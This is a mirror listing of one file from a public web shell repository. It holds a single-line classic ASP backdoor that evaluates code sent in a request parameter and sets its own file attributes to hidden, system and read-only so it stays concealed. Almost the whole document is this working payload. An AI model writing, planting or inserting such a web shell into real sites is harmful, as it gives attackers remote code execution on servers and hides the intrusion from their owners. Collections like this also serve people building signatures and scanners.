mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
1 line
193 B
Plaintext
1 line
193 B
Plaintext
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%> |